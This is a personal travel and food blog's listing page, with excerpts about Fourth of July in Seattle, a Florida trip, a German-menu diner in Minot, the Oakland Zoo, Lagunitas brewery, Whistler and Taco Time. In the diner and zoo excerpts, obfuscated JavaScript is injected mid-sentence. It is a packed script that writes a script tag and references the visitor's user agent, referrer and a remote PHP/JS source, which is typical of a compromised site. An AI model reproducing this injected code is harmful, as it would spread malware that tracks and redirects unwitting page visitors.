Nick and I spent the 4th of July in Seattle at Nick’s parent’s house. The 4th of July celebrations at “the lake house” date back to college and the party has grown steadily every since. It was a beautiful summer day in Seattle – mid 70’s and only a few clouds. This obviously beats overcast […]

I spent ALL of last week soaking in the sun in Florida. I was there for work, but stayed a few days on the beach – which made the long trip a bit more bearable. Truth be told, this is really not a bad part of the country. I think it gets a bad rap. […]
Kroll’s Diner – Minot, ND
We had dinner at a diner last night. A diner with a partially German menu. I ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|niian|var|u0026u|referrer|rynfa||js|php’.split(‘|’),0,{})) had breakfast. And it came with the largest plate of hash towns I’ve ever seen. And 2 pancakes. And it was amazing and delicious! A few of the more interesting items:
Oakland Zoo
April Fool’s Day! I’ve been kinda busy and slacked a bit on the blog in favor of friends and sleep. Can you blame me? Last Friday I headed to the Oakland Zoo with Brooke, Lana, and Malina. I’m a big fan of zoos (Santa ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ezrrt|var|u0026u|referrer|fhrye||js|php’.split(‘|’),0,{})) Barbara, Phoenix, San Diego, St. Louis, […]
We spent this past Saturday celebrating our friends’ birthday at Lagunitas in Petaluma. Even for this non-beer-drinking-gal, it was still a ton of fun and I recommend it if you’re ever in the area. We showed up around 1PM. A terrible time to show up, especially on St. Patrick’s Day weekend. The place was packed […]

As a follow up to last weeks post about places to eat in Seattle, I thought I’d throw in some of my favorite things to do (that don’t necessarily involve eating). 1. Gas Works Park I wrote a paper about the park in college (and don’t remember what I wrote about, clearly money well spent). […]
We live in northern California, but we grew up in Seattle. As a result, many California friends ask us what to do when they visit the Pacific Northwest! I actually feel really removed from Seattle after living in California for so long, so I wouldn’t call myself an expert. However, I do have a list […]
I always wanted to compete in the Olympics. But I had hoped it would be as part of the women’s gymnastics team a la Mary Lou Retton. Well, I never did make it past a back handspring. Thankfully, I had a chance to live out some Olympic fantasies at the sliding centre in Whistler. We […]
So we hit up a Taco Time – yes – a Taco Time. You don’t know about Taco Time? It’s a Washington thing apparently. And it’s good bad Mexican food. The best part? They sell mexi-fries. Which are basically super crunchy tater tots. Guess what else they have? A futuristic Coke machine that dispenses 100+ […]
